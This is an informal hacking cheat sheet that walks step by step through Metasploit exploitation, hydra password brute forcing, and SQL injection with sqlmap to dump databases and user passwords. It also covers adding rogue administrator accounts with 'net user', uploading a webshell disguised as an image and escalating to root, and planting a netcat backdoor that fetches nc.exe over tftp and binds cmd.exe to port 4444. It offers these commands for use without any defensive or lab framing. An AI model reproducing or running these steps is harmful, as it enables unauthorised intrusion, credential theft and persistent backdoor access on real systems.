===METASPLOIT===

search vulnerability_name
use exploit/name
show payloads
set payload payload_name
SHOW OPTIONS
SET RHOST HOSTNAME
SHOW OPTIONS
EXPLOIT

=====Meterpreter====

changing path with spaces

cd /"Program Files"/"Internet Explorer"

==cain===
1: set target ip
2: enumerate users
3: then use hydra -l user -P rockyou.txt ftp://ip
4: reconnect with the user
5: install able
6: reconnect and goto hashes
7: find admin ending with 500
8: send to cracker
9: reset initial position
10: and start hence password will be cracked now login with admin and create new
user
11: net user username password /add (for adding users)
12: net localgroup administratros username /add (for adding as an administrator)

NULL SESSION COMMAND

net use \\IP_ADDRESS\ipc$ "" /user:""

*********NESSUS**************
1: start nessus service
/etc/init.d/nessusd start
2: start scanning
3: find exploit number Something like MS17_010_eternalblue etc
4: Exploit

=====NMAP=======

{Tools needed nmap}

nmap -A IP Address

===hydra===

hydra -l username -P dictionary path ftp:ip (if you know username)

hydra -L dictionary path -P dictionary path ftp:ip (if you dont know username
password)
====SQL INJECTION========

{Tools needed sqlmap}

test' or 'a'='a username and password

sqlmap -u LINK --dbs ==> to check databases
sqlmap -u LINK -D dbname -T tabels ==> check db tables
sqlmap - u LINK -D dbname -T tblname --columns ==> to check columns
sqlmap -u LINK -D dbname -T tblname --columns --dump ==> to dump columns to a file
sqlmap -u LINK -D dbname --columns ==> to show all available columns of selected
database

sqlmap -u "LINK" -o -b --current-user --is-dba ===> For checking if current user is

DBA
sqlmap -u "LINK" -v1 --current-user --password ===> For getting current user
password

===Uploading Shell & server Rooting ===

{tools needed root script and shell}

1: Sql Injection for login

2: ther should be a link vulnerable for sqlmap
3: get admin username and password
4: Login with Admin
5: find upload button/form
6: upload webshell by changing extension .jpeg/.png etc
7: write the complete filename in the path and press enter to get cmd access or
type "cmd=uname -a" to get system info!
8: if rooted there should be "#" sign in terminal else there should be "$"
9: Find some rooting script with ".C" extension for rooting
10: Compiling ".C" File Commands
gcc program-source-code.c -o executable-file-name
make executable-file-name
./demo

===nc commands for backdoor in system wihtout web====

1: goto hacker machine and open tftp from tools
2: tftp -i IP get nc.exe
3: nc-L-P 4444 -e cmd.exe -d